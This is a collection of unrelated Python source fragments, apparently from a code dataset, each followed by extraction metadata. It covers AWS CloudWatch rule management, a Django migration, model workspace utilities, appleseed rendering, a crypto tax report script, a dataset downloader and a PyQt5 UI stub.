    def list_rules(self):
        """Return all NARUKO- rules as one flat list of CloudWatchEvent."""
        response = []
        for rules in self._list_rules():
            response.extend(rules)
        return response

    def _list_rules(self):
        """Yield one list of CloudWatchEvent per API result page.

        Follows the service's NextToken pagination until exhausted.
        """
        # The first request carries no pagination token.
        response = self.client.list_rules(NamePrefix='NARUKO-')
        token = response.get("NextToken")
        yield self._build_cloudwatchevent(response["Rules"])
        # Keep requesting pages while a continuation token is returned.
        while token:
            response = self.client.list_rules(
                NamePrefix='NARUKO-',
                NextToken=token
            )
            token = response.get("NextToken")
            yield self._build_cloudwatchevent(response["Rules"])

    @staticmethod
    def _build_cloudwatchevent(rules: list):
        """Convert raw rule dicts into CloudWatchEvent model instances.

        Args:
            rules: the ``Rules`` list of a ``list_rules`` response; each
                entry has ``Name``, ``State`` and (for scheduled rules)
                ``ScheduleExpression``.
        """
        # NOTE: parameter was previously annotated ``dict`` although the
        # API hands over a list of dicts.
        return [
            CloudWatchEvent(
                name=rule["Name"],
                schedule_expression=rule.get("ScheduleExpression"),
                is_active=rule["State"] == "ENABLED"
            )
            for rule in rules
        ]

    def save_event(self, event):
        """Create (or update) the rule and its SNS target for ``event``.

        Args:
            event: object exposing ``cloudwatchevent`` (name,
                schedule_expression, is_active) and ``event_model`` (id).

        Returns:
            The same ``event`` instance, for chaining.
        """
        # Create the rule.
        self.client.put_rule(
            Name=event.cloudwatchevent.name,
            ScheduleExpression=event.cloudwatchevent.schedule_expression,
            State="ENABLED" if event.cloudwatchevent.is_active else "DISABLED"
        )
        # Create the target: publish the event id to the SNS topic.
        target = dict(
            Id=event.cloudwatchevent.name,
            Arn=settings.EVENT_SNS_TOPIC_ARN,
            Input=json.dumps(dict(id=event.event_model.id))
        )
        self.client.put_targets(
            Rule=event.cloudwatchevent.name,
            Targets=[target]
        )
        return event

    def delete_event(self, event_name):
        """Delete the rule named ``event_name`` together with its target."""
        # Remove the target first; a rule with targets cannot be deleted.
        self.client.remove_targets(
            Rule=event_name,
            Ids=[event_name]
        )
        # Delete the rule itself.
        self.client.delete_rule(
            Name=event_name
        )

    def describe_event(self, event_name):
        """Fetch a single rule and return it as a CloudWatchEvent."""
        response = self.client.describe_rule(
            Name=event_name
        )
        # NOTE(review): assumes the rule always carries ScheduleExpression —
        # describe_rule omits the key for event-pattern rules; confirm all
        # NARUKO- rules are schedule based.
        return CloudWatchEvent(
            name=response["Name"],
            schedule_expression=response["ScheduleExpression"],
            is_active=response["State"] == "ENABLED"
        )
| [
"boto3.client",
"backend.models.CloudWatchEvent"
] | [((173, 231), 'boto3.client', 'boto3.client', (['"""events"""'], {'region_name': 'settings.NARUKO_REGION'}), "('events', region_name=settings.NARUKO_REGION)\n", (185, 231), False, 'import boto3\n'), ((2363, 2500), 'backend.models.CloudWatchEvent', 'CloudWatchEvent', ([], {'name': "response['Name']", 'schedule_expression': "response['ScheduleExpression']", 'is_active': "(response['State'] == 'ENABLED')"}), "(name=response['Name'], schedule_expression=response[\n 'ScheduleExpression'], is_active=response['State'] == 'ENABLED')\n", (2378, 2500), False, 'from backend.models import CloudWatchEvent\n')] |
#!/usr/bin/env python
# Manipulate sys.path to be able to import converscript from this local git
# repository.
import os
import sys
sys.path.append(os.path.join(os.path.dirname(__file__), "..", ".."))
from converscript import RiveScript
import json
# Demo script: load a RiveScript document from disk and print its deparsed
# (in-memory) representation as pretty-printed JSON.
bot = RiveScript()
bot.load_file("example.rive")
dep = bot.deparse()
print(json.dumps(dep, indent=2))
| [
"os.path.dirname",
"json.dumps",
"converscript.RiveScript"
] | [((259, 271), 'converscript.RiveScript', 'RiveScript', ([], {}), '()\n', (269, 271), False, 'from converscript import RiveScript\n'), ((329, 354), 'json.dumps', 'json.dumps', (['dep'], {'indent': '(2)'}), '(dep, indent=2)\n', (339, 354), False, 'import json\n'), ((163, 188), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (178, 188), False, 'import os\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add a boolean ``shortcut`` flag (default False) to the Module model."""
    # Must be applied after the migration that added Module.floor.
    dependencies = [
        ('modules', '0002_module_floor'),
    ]
    operations = [
        migrations.AddField(
            model_name='module',
            name='shortcut',
            field=models.BooleanField(default=False),
        ),
    ]
| [
"django.db.models.BooleanField"
] | [((346, 380), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (365, 380), False, 'from django.db import models, migrations\n')] |
import abc
import argparse
import logging
import pathlib
from collections import namedtuple
from operator import itemgetter
import toml
class NotConfiguredError(Exception):
    """Raised when a workspace's config.toml is missing or incomplete."""
    pass
class ParseError(Exception):
    """Raised when command-line arguments cannot be parsed (see Model.parse)."""
    pass
class Model(abc.ABC):
    """Interface for model that can save/load parameters.

    Each model class should have an ``add_arguments`` class method to define
    model arguments along with their types, default values, etc.
    """

    @classmethod
    @abc.abstractmethod
    def add_arguments(cls, parser: argparse.ArgumentParser):
        """Add arguments to an argparse subparser."""
        raise NotImplementedError

    @classmethod
    def build(cls, **kwargs):
        """Build model. Parameters are specified by keyword arguments.

        Example:
            >>> from models import Simple
            >>> model = Simple.build(foo=3)
            >>> print(model.config)
            Config(foo=3)
        """
        # Sort keys so the generated namedtuple has a deterministic field
        # order regardless of the kwargs order at the call site.
        keys = sorted(kwargs)
        # Unlike the previous zip-based unpacking, this also works when no
        # keyword argument is given (an empty config).
        config = namedtuple(cls.__name__, keys)(*(kwargs[k] for k in keys))
        return cls(config)

    @classmethod
    def parse(cls, args):
        """Parse command-line options and build model.

        Raises:
            ParseError: if ``args`` do not match the declared arguments.
        """

        class _ArgumentParser(argparse.ArgumentParser):
            # Raise instead of argparse's default sys.exit() so callers
            # can recover from bad input.
            def error(self, message):
                raise ParseError(message)

        parser = _ArgumentParser(prog='', add_help=False)
        cls.add_arguments(parser)
        args = parser.parse_args(args)
        config = dict(args._get_kwargs())
        # Fold dotted option names ("sec.key") into nested dicts.
        Model._unfold_config(config)
        return cls.build(**config)

    def __init__(self, config):
        """
        Args:
            config (namedtuple): model configuration
        """
        self.config = config

    def __str__(self):
        return str(self.config)

    @staticmethod
    def _unfold_config(cfg):
        """Recursively expand dotted keys into nested dicts, in place.

        ``{'a.b': 1}`` becomes ``{'a': {'b': 1}}``; existing intermediate
        dicts are reused and the dotted key itself is removed.
        """
        for key, value in list(cfg.items()):
            if isinstance(value, dict):
                Model._unfold_config(value)
            if '.' not in key:
                continue
            *sections, leaf = key.split('.')
            node = cfg
            for sec in sections:
                if sec not in node:
                    node[sec] = {}
                node = node[sec]
            node[leaf] = value
            del cfg[key]
class Workspace:
    """Workspace utilities. One can save/load configurations, build models
    with specific configuration, save snapshots, open results, etc., using
    workspace objects."""
    def __init__(self, path: str, model=None, config=None):
        """
        Args:
            path: directory backing this workspace.
            model: model class or its class name; when omitted, model and
                config are loaded lazily from ``config.toml`` on first use.
            config: dict of model parameters; defaults to ``{}`` when a
                model is given.
        """
        self._path = pathlib.Path(path)
        self._log_path = self._path / 'log'
        self._snapshot_path = self._path / 'snapshot'
        self._result_path = self._path / 'result'
        if model is None:
            # Lazy mode: resolved from disk on first attribute access.
            self._model_cls = None
            self._config = None
            return
        if config is None:
            config = {}
        self._set_model(model, config)
        self._save()
    def __str__(self):
        return str(self.path)
    def __repr__(self):
        return 'Workspace(path=' + str(self.path) + ')'
    def _set_model(self, model, config):
        # ``model`` may be a class or a class name inside the models package.
        if isinstance(model, str):
            self._model_cls = Workspace._get_class(model)
        else:
            self._model_cls = model
        self._config = config
    @staticmethod
    def _get_class(name):
        # Resolve a model class by name from the sibling ``models`` module.
        from . import models as mm
        return getattr(mm, name)
    # Each path property creates its directory on first access.
    @property
    def path(self):
        if not self._path.exists():
            self._path.mkdir(parents=True)
        return self._path
    @property
    def result_path(self):
        if not self._result_path.exists():
            self._result_path.mkdir(parents=True)
        return self._result_path
    @property
    def snapshot_path(self):
        if not self._snapshot_path.exists():
            self._snapshot_path.mkdir(parents=True)
        return self._snapshot_path
    @property
    def log_path(self):
        if not self._log_path.exists():
            self._log_path.mkdir(parents=True)
        return self._log_path
    @property
    def model_name(self):
        return self.model_cls.__name__
    @property
    def model_cls(self):
        # Lazily load from config.toml when not set in __init__.
        if self._model_cls is not None:
            return self._model_cls
        self._load()
        return self._model_cls
    @property
    def config(self):
        # Lazily load from config.toml when not set in __init__.
        if self._config is not None:
            return self._config
        self._load()
        return self._config
    def setup_like(self, model: Model):
        """Configure workspace with configurations from a given model.

        Args:
            model (Model): model to be used
        """
        self._set_model(model.__class__, model.config._asdict())
    def build_model(self):
        """Build model according to the configurations in current
        workspace."""
        return self.model_cls.build(**self.config)
    def logger(self, name: str):
        """Get a logger that logs to a file.

        Notice that same logger instance is returned for same names.

        Args:
            name(str): logger name
        """
        logger = logging.getLogger(name)
        if logger.handlers:
            # previously configured, remain unchanged
            return logger
        fileFormatter = logging.Formatter('%(levelname)s [%(name)s] '
                                          '%(asctime)s %(message)s',
                                          datefmt='%Y-%m-%d %H:%M:%S')
        fileHandler = logging.FileHandler(
            str(self.log_path / (name + '.log')))
        fileHandler.setFormatter(fileFormatter)
        logger.addHandler(fileHandler)
        return logger
    def _load(self):
        """Load configuration."""
        try:
            cfg = toml.load((self.path / 'config.toml').open())
            self._set_model(cfg['model_name'], cfg[cfg['model_name'].lower()])
        except (FileNotFoundError, KeyError):
            raise NotConfiguredError('config.toml doesn\'t exist or '
                                     'is incomplete')
    def _save(self):
        """Save configuration."""
        f = (self.path / 'config.toml').open('w')
        toml.dump({'model_name': self.model_name,
                   self.model_name.lower(): self.config}, f)
        f.close()
class Command(abc.ABC):
    """Base class for CLI subcommands that operate on a workspace."""

    def __init__(self, parser):
        self.parser = parser

    def _run(self, args):
        # Resolve the target workspace, then strip the bookkeeping
        # attributes so only the command's own options remain.
        ws = Workspace(args.workspace)
        cmd = args.command
        del args.command, args.func, args.workspace
        options = dict(args._get_kwargs())
        bundle = namedtuple(cmd.capitalize(), options.keys())(*options.values())
        return self.run(ws, bundle)

    @abc.abstractmethod
    def run(self, ws, args):
        raise NotImplementedError
| [
"logging.getLogger",
"collections.namedtuple",
"pathlib.Path",
"logging.Formatter",
"operator.itemgetter"
] | [((2561, 2579), 'pathlib.Path', 'pathlib.Path', (['path'], {}), '(path)\n', (2573, 2579), False, 'import pathlib\n'), ((5102, 5125), 'logging.getLogger', 'logging.getLogger', (['name'], {}), '(name)\n', (5119, 5125), False, 'import logging\n'), ((5258, 5360), 'logging.Formatter', 'logging.Formatter', (['"""%(levelname)s [%(name)s] %(asctime)s %(message)s"""'], {'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "('%(levelname)s [%(name)s] %(asctime)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n", (5275, 5360), False, 'import logging\n'), ((1040, 1070), 'collections.namedtuple', 'namedtuple', (['cls.__name__', 'keys'], {}), '(cls.__name__, keys)\n', (1050, 1070), False, 'from collections import namedtuple\n'), ((1007, 1020), 'operator.itemgetter', 'itemgetter', (['(0)'], {}), '(0)\n', (1017, 1020), False, 'from operator import itemgetter\n')] |
import os
import subprocess
import threading
# Serializes access to the shared template/project files and the renderer.
mutex = threading.Lock()


def render_appleseed(target_file, base_color_tex, normal_tex, roughness_tex, metallic_tex, resolution, appleseed_path):
    """Render a preview image with appleseed.

    Fills the scene template with the given texture paths and output
    resolution, writes a project file next to ``target_file`` and invokes
    the appleseed CLI to render it.

    Args:
        target_file: path of the image file to produce.
        base_color_tex, normal_tex, roughness_tex, metallic_tex: texture paths.
        resolution: (width, height) pair in pixels.
        appleseed_path: root directory of the appleseed installation.

    Raises:
        Exception: re-raised after printing a message if any step fails.
    """
    # ``with`` guarantees the lock is released on every exit path (the
    # previous acquire/try/finally pattern, expressed idiomatically).
    with mutex:
        try:
            # Read the template file from disk.
            with open("scene_template.appleseed", "r") as file:
                project_text = file.read()

            # Substitute variables by their values (table driven; insertion
            # order matches the original replace sequence).
            substitutions = {
                "$baseColorTexturePath": base_color_tex,
                "$normalTexturePath": normal_tex,
                "$roughnessTexturePath": roughness_tex,
                "$metallicTexturePath": metallic_tex,
                "$frameWidth": str(resolution[0]),
                "$frameHeight": str(resolution[1]),
            }
            for placeholder, value in substitutions.items():
                project_text = project_text.replace(placeholder, value)

            # Write the new project file to disk.
            project_file = os.path.splitext(target_file)[0] + ".appleseed"
            with open(project_file, "w") as file:
                file.write(project_text)

            # Invoke appleseed to render the project file.
            appleseed_cli_path = os.path.join(appleseed_path, "bin", "appleseed.cli.exe" if os.name == "nt" else "appleseed.cli")
            subprocess.check_call([appleseed_cli_path, "--message-verbosity", "error", project_file, "--output", target_file])
        except Exception as e:
            print("Failed to generate {0} with appleseed: {1}".format(target_file, e))
            raise
| [
"threading.Lock",
"os.path.splitext",
"os.path.join",
"subprocess.check_call"
] | [((54, 70), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (68, 70), False, 'import threading\n'), ((1189, 1289), 'os.path.join', 'os.path.join', (['appleseed_path', '"""bin"""', "('appleseed.cli.exe' if os.name == 'nt' else 'appleseed.cli')"], {}), "(appleseed_path, 'bin', 'appleseed.cli.exe' if os.name == 'nt' else\n 'appleseed.cli')\n", (1201, 1289), False, 'import os\n'), ((1294, 1412), 'subprocess.check_call', 'subprocess.check_call', (["[appleseed_cli_path, '--message-verbosity', 'error', project_file,\n '--output', target_file]"], {}), "([appleseed_cli_path, '--message-verbosity', 'error',\n project_file, '--output', target_file])\n", (1315, 1412), False, 'import subprocess\n'), ((973, 1002), 'os.path.splitext', 'os.path.splitext', (['target_file'], {}), '(target_file)\n', (989, 1002), False, 'import os\n')] |
from ubuntui.utils import Padding
from ubuntui.widgets.hr import HR
from conjureup.app_config import app
from conjureup.ui.views.base import BaseView, SchemaFormView
from conjureup.ui.widgets.selectors import MenuSelectButtonList
class NewCredentialView(SchemaFormView):
    """Schema-driven form for entering credentials for the active provider."""

    title = "New Credential Creation"

    def __init__(self, *args, **kwargs):
        # Show which cloud the credentials belong to, e.g. "AWS".
        provider_name = app.provider.cloud_type.upper()
        self.subtitle = "Enter your {} credentials".format(provider_name)
        super().__init__(*args, **kwargs)
class CredentialPickerView(BaseView):
    """Menu view for picking an existing credential or adding a new one."""

    title = "Choose a Credential"
    subtitle = "Please select an existing credential, " \
               "or choose to add a new one."
    footer = 'Please press [ENTER] on highlighted credential to proceed.'

    def __init__(self, credentials, default, submit_cb, back_cb):
        self.credentials = credentials
        self.default = default
        self.submit_cb = submit_cb
        self.prev_screen = back_cb
        super().__init__()

    def build_widget(self):
        """Build the selector: credentials, a separator, then an 'add new' row."""
        selector = MenuSelectButtonList(self.credentials, self.default)
        selector.append(Padding.line_break(""))
        selector.append(HR())
        selector.append_option("Add a new credential", None)
        return selector

    def submit(self):
        # Hand the highlighted entry to the registered callback.
        self.submit_cb(self.widget.selected)
| [
"ubuntui.widgets.hr.HR",
"conjureup.ui.widgets.selectors.MenuSelectButtonList",
"ubuntui.utils.Padding.line_break",
"conjureup.app_config.app.provider.cloud_type.upper"
] | [((375, 406), 'conjureup.app_config.app.provider.cloud_type.upper', 'app.provider.cloud_type.upper', ([], {}), '()\n', (404, 406), False, 'from conjureup.app_config import app\n'), ((1051, 1103), 'conjureup.ui.widgets.selectors.MenuSelectButtonList', 'MenuSelectButtonList', (['self.credentials', 'self.default'], {}), '(self.credentials, self.default)\n', (1071, 1103), False, 'from conjureup.ui.widgets.selectors import MenuSelectButtonList\n'), ((1126, 1148), 'ubuntui.utils.Padding.line_break', 'Padding.line_break', (['""""""'], {}), "('')\n", (1144, 1148), False, 'from ubuntui.utils import Padding\n'), ((1172, 1176), 'ubuntui.widgets.hr.HR', 'HR', ([], {}), '()\n', (1174, 1176), False, 'from ubuntui.widgets.hr import HR\n')] |
#!/usr/bin/env python3
import transactions
import taxmap
import db
import settings
import datetime
import argparse
import uuid
import pickle
import jsonpickle
import logging
import logging.handlers
import traceback
def main():
    """Generate a tax report for one wallet over a date range.

    Run as a worker process; progress and results are persisted through the
    ``db`` module (status codes, transaction/report files) so a UI can poll.
    Returns 1 on failure paths, otherwise falls off the end (None).
    """
    # Rotating file log so long-running workers don't fill the disk.
    handler = logging.handlers.RotatingFileHandler('../main.log', maxBytes=33554432, backupCount=10)
    logging.basicConfig(handlers=[handler], level=logging.INFO, format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt='%Y-%m-%d %H:%M:%S')
    logging.info('We got a report request')
    parser = argparse.ArgumentParser()
    parser.add_argument("wallet", help="The evm compatible wallet address to generate for")
    parser.add_argument("startDate", help="The starting date for the report")
    parser.add_argument("endDate", help="The ending date for the report")
    parser.add_argument("--costbasis", choices=['fifo','lifo','hifo','acb'], help="Method for mapping cost basis to gains")
    parser.add_argument("--chains", choices=['1','2','3','4','5','6','7'], help="Bitwise integer of blockchains to include 1=Harmony,2=Avax,4=DFKChain")
    args = parser.parse_args()
    if args.costbasis == None:
        costBasis = 'fifo'
    else:
        costBasis = args.costbasis
    page_size = settings.TX_PAGE_SIZE
    txResult = 0
    txData = []
    moreOptions = db.ReportOptions()
    # list of transactions if loaded from file if available, otherwise fetched
    reportInfo = db.findReport(args.wallet, args.startDate, args.endDate)
    # reportInfo[5] > 0 and a non-empty reportInfo[8] mean the transaction
    # fetch already finished and its file name is recorded.
    if reportInfo != None and reportInfo[5] > 0 and len(reportInfo[8]) > 0:
        includedChains = reportInfo[12]
        with open('../transactions/{0}'.format(reportInfo[8]), 'rb') as file:
            txData = pickle.load(file)
    else:
        # generate.py pre-generates report record, but if running outside of that, create one
        if reportInfo == None:
            generateTime = datetime.datetime.now()
            txResult = transactions.getTransactionCount(args.wallet)
            includedChains = 1
            db.createReport(args.wallet, args.startDate, args.endDate, int(datetime.datetime.timestamp(generateTime)), txResult, costBasis, includedChains, 1)
        else:
            includedChains = reportInfo[12]
            try:
                moreOptions = jsonpickle.loads(reportInfo[13])
            except Exception as err:
                logging.warning('Ignoring failure to load more options, probably old ui not setting it.')
        logging.info('Loading transactions list for {0}'.format(args.wallet))
        # Scale up default page size for very large accounts
        if reportInfo != None and reportInfo[4] > page_size*50:
            page_size = min(1000, page_size*5)
        try:
            txData = transactions.getTransactionList(args.wallet, args.startDate, args.endDate, page_size, includedChains)
        except Exception as err:
            # Status 8 signals a (likely transient) fetch failure.
            logging.error('Unexpected Error {0} fetching transaction list, setting report to failure.'.format(err))
            traceback.print_exc()
            db.updateReportError(args.wallet, args.startDate, args.endDate, 8)
            return 1
        # The transactions are written to a file and record updated indicate fetching complete
        transactionsFile = uuid.uuid4().hex
        with open('../transactions/{0}'.format(transactionsFile), 'wb') as f:
            pickle.dump(txData, f)
        try:
            db.completeTransactions(args.wallet, args.startDate, args.endDate, transactionsFile)
        except Exception as err:
            logging.error('DB report update tx complete failure: {0}'.format(str(err)))
    # With transaction list, we now generate the events and tax map
    try:
        reportData = taxmap.buildTaxMap(txData, args.wallet, datetime.datetime.strptime(args.startDate, '%Y-%m-%d').date(), datetime.datetime.strptime(args.endDate, '%Y-%m-%d').date(), costBasis, includedChains, moreOptions)
    except Exception as err:
        logging.error('Unexpected Error {0} building tax map, setting report to failure.'.format(err))
        traceback.print_exc()
        # Set a different code when web3.exceptions.TransactionNotFound
        # so we can relay that it is about network rpc issue, try later
        if str(err) == "{'message': 'Relay attempts exhausted', 'code': -32050}":
            statusCode = 8
        elif "Bad Gateway for url" in str(err) or "Service Unavailable" in str(err) or "Max retries exceeded" in str(err):
            statusCode = 8
        else:
            statusCode = 9
        try:
            db.updateReportError(args.wallet, args.startDate, args.endDate, statusCode)
        except Exception as err:
            logging.error('DB report update error failure: {0}'.format(str(err)))
        return 1
    for item in reportData['taxes']:
        logging.debug(str(item.__dict__) + '\n')
    # The results are written to a file and record updated to notify completion
    reportFile = uuid.uuid4().hex
    with open('../reports/{0}'.format(reportFile), 'wb') as f:
        pickle.dump(reportData, f)
    try:
        db.completeReport(args.wallet, args.startDate, args.endDate, reportFile)
    except Exception as err:
        logging.error('DB report update complete failure: {0}'.format(str(err)))
if __name__ == "__main__":
    main()
| [
"transactions.getTransactionCount",
"logging.info",
"db.findReport",
"argparse.ArgumentParser",
"transactions.getTransactionList",
"db.updateReportError",
"traceback.print_exc",
"jsonpickle.loads",
"logging.handlers.RotatingFileHandler",
"pickle.load",
"logging.warning",
"db.ReportOptions",
... | [((243, 333), 'logging.handlers.RotatingFileHandler', 'logging.handlers.RotatingFileHandler', (['"""../main.log"""'], {'maxBytes': '(33554432)', 'backupCount': '(10)'}), "('../main.log', maxBytes=33554432,\n backupCount=10)\n", (279, 333), False, 'import logging\n'), ((334, 494), 'logging.basicConfig', 'logging.basicConfig', ([], {'handlers': '[handler]', 'level': 'logging.INFO', 'format': '"""%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s"""', 'datefmt': '"""%Y-%m-%d %H:%M:%S"""'}), "(handlers=[handler], level=logging.INFO, format=\n '%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n", (353, 494), False, 'import logging\n'), ((489, 528), 'logging.info', 'logging.info', (['"""We got a report request"""'], {}), "('We got a report request')\n", (501, 528), False, 'import logging\n'), ((542, 567), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (565, 567), False, 'import argparse\n'), ((1313, 1331), 'db.ReportOptions', 'db.ReportOptions', ([], {}), '()\n', (1329, 1331), False, 'import db\n'), ((1429, 1485), 'db.findReport', 'db.findReport', (['args.wallet', 'args.startDate', 'args.endDate'], {}), '(args.wallet, args.startDate, args.endDate)\n', (1442, 1485), False, 'import db\n'), ((4925, 4937), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4935, 4937), False, 'import uuid\n'), ((5013, 5039), 'pickle.dump', 'pickle.dump', (['reportData', 'f'], {}), '(reportData, f)\n', (5024, 5039), False, 'import pickle\n'), ((5057, 5129), 'db.completeReport', 'db.completeReport', (['args.wallet', 'args.startDate', 'args.endDate', 'reportFile'], {}), '(args.wallet, args.startDate, args.endDate, reportFile)\n', (5074, 5129), False, 'import db\n'), ((1701, 1718), 'pickle.load', 'pickle.load', (['file'], {}), '(file)\n', (1712, 1718), False, 'import pickle\n'), ((1881, 1904), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1902, 1904), False, 'import datetime\n'), ((1928, 1973), 
'transactions.getTransactionCount', 'transactions.getTransactionCount', (['args.wallet'], {}), '(args.wallet)\n', (1960, 1973), False, 'import transactions\n'), ((2730, 2835), 'transactions.getTransactionList', 'transactions.getTransactionList', (['args.wallet', 'args.startDate', 'args.endDate', 'page_size', 'includedChains'], {}), '(args.wallet, args.startDate, args.endDate,\n page_size, includedChains)\n', (2761, 2835), False, 'import transactions\n'), ((3237, 3249), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (3247, 3249), False, 'import uuid\n'), ((3344, 3366), 'pickle.dump', 'pickle.dump', (['txData', 'f'], {}), '(txData, f)\n', (3355, 3366), False, 'import pickle\n'), ((3392, 3480), 'db.completeTransactions', 'db.completeTransactions', (['args.wallet', 'args.startDate', 'args.endDate', 'transactionsFile'], {}), '(args.wallet, args.startDate, args.endDate,\n transactionsFile)\n', (3415, 3480), False, 'import db\n'), ((4041, 4062), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (4060, 4062), False, 'import traceback\n'), ((2269, 2301), 'jsonpickle.loads', 'jsonpickle.loads', (['reportInfo[13]'], {}), '(reportInfo[13])\n', (2285, 2301), False, 'import jsonpickle\n'), ((2993, 3014), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3012, 3014), False, 'import traceback\n'), ((3027, 3093), 'db.updateReportError', 'db.updateReportError', (['args.wallet', 'args.startDate', 'args.endDate', '(8)'], {}), '(args.wallet, args.startDate, args.endDate, 8)\n', (3047, 3093), False, 'import db\n'), ((4532, 4607), 'db.updateReportError', 'db.updateReportError', (['args.wallet', 'args.startDate', 'args.endDate', 'statusCode'], {}), '(args.wallet, args.startDate, args.endDate, statusCode)\n', (4552, 4607), False, 'import db\n'), ((2080, 2121), 'datetime.datetime.timestamp', 'datetime.datetime.timestamp', (['generateTime'], {}), '(generateTime)\n', (2107, 2121), False, 'import datetime\n'), ((2355, 2449), 'logging.warning', 'logging.warning', 
(['"""Ignoring failure to load more options, probably old ui not setting it."""'], {}), "(\n 'Ignoring failure to load more options, probably old ui not setting it.')\n", (2370, 2449), False, 'import logging\n'), ((3737, 3791), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['args.startDate', '"""%Y-%m-%d"""'], {}), "(args.startDate, '%Y-%m-%d')\n", (3763, 3791), False, 'import datetime\n'), ((3800, 3852), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['args.endDate', '"""%Y-%m-%d"""'], {}), "(args.endDate, '%Y-%m-%d')\n", (3826, 3852), False, 'import datetime\n')] |
"""データセットをダウンロードするためのスクリプトです."""
# default packages
import logging
import pathlib
import traceback
import urllib.request as request
# third party
import pandas as pd
import tqdm as tqdm_std
# my packages
import src.data.directory as directory
# logger
logger = logging.getLogger(__name__)
class TqdmUpTo(tqdm_std.tqdm):
    """Provides `update_to(n)` which uses `tqdm.update(delta_n)`.

    Progress-bar adapter whose ``update_to`` matches the ``reporthook``
    callback signature used by ``urllib.request.urlretrieve``.
    """
    def update_to(self, b: int = 1, bsize: int = 1, tsize: int = None) -> None:
        """Advance the bar to the cumulative download position.

        Args:
            b (int, optional): Number of blocks transferred. Defaults to 1.
            bsize (int, optional): Size of each block (in tqdm units). Defaults to 1.
            tsize (int, optional): Total size (in tqdm units). Defaults to None.
        """
        if tsize is not None:
            self.total = tsize
        # reporthook gives cumulative progress, but tqdm.update wants a
        # delta, so subtract what has been counted so far (self.n).
        self.update(b * bsize - self.n)
def get_raw_filepath() -> pathlib.Path:
    """Return the local path under the raw-data directory for the archive."""
    download_url = get_raw_url()
    archive_name = download_url.rsplit("/", 1)[-1]
    return directory.get_raw().joinpath(archive_name)
def get_raw_url() -> str:
    """Return the download URL of the Jena climate dataset archive."""
    base = "https://storage.googleapis.com/tensorflow/tf-keras-datasets/"
    return base + "jena_climate_2009_2016.csv.zip"
def _main() -> None:
    """Download the Jena climate dataset if missing and log a summary."""
    import io

    logging.basicConfig(level=logging.INFO)

    filepath = get_raw_filepath()
    if filepath.exists() is False:
        url = get_raw_url()
        filepath.parent.mkdir(exist_ok=True, parents=True)
        # Show a progress bar; update_to matches the reporthook signature.
        with TqdmUpTo(
            unit="B", unit_scale=True, miniters=1, desc=filepath.name
        ) as pbar:
            request.urlretrieve(
                url, filename=filepath, reporthook=pbar.update_to, data=None
            )
    else:
        logger.info(f"data already exists: {filepath}")

    # show dataset description.
    df = pd.read_csv(filepath)
    # DataFrame.info() prints to stdout and returns None, so the previous
    # logger.info(df.info()) logged "None"; capture the text via buf=.
    info_buffer = io.StringIO()
    df.info(buf=info_buffer)
    logger.info(info_buffer.getvalue())
    logger.info(df.head())
    logger.info(df.tail())
if __name__ == "__main__":
    try:
        _main()
    except Exception as e:
        # Log the failure (message plus full traceback) instead of letting
        # the exception escape to stderr unformatted.
        logger.error(e)
        logger.error(traceback.format_exc())
| [
"logging.getLogger",
"logging.basicConfig",
"traceback.format_exc",
"pandas.read_csv",
"urllib.request.urlretrieve",
"src.data.directory.get_raw"
] | [((264, 291), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (281, 291), False, 'import logging\n'), ((1292, 1331), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (1311, 1331), False, 'import logging\n'), ((1833, 1854), 'pandas.read_csv', 'pd.read_csv', (['filepath'], {}), '(filepath)\n', (1844, 1854), True, 'import pandas as pd\n'), ((1000, 1019), 'src.data.directory.get_raw', 'directory.get_raw', ([], {}), '()\n', (1017, 1019), True, 'import src.data.directory as directory\n'), ((1613, 1699), 'urllib.request.urlretrieve', 'request.urlretrieve', (['url'], {'filename': 'filepath', 'reporthook': 'pbar.update_to', 'data': 'None'}), '(url, filename=filepath, reporthook=pbar.update_to, data\n =None)\n', (1632, 1699), True, 'import urllib.request as request\n'), ((2062, 2084), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (2082, 2084), False, 'import traceback\n')] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'F:\work\code\pyqt5\ui\main.ui'
#
# Created by: PyQt5 UI code generator 5.9
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(963, 727)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(1)
sizePolicy.setHeightForWidth(self.tabWidget.sizePolicy().hasHeightForWidth())
self.tabWidget.setSizePolicy(sizePolicy)
self.tabWidget.setMinimumSize(QtCore.QSize(571, 0))
self.tabWidget.setMaximumSize(QtCore.QSize(16777215, 16777215))
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout = QtWidgets.QVBoxLayout(self.tab)
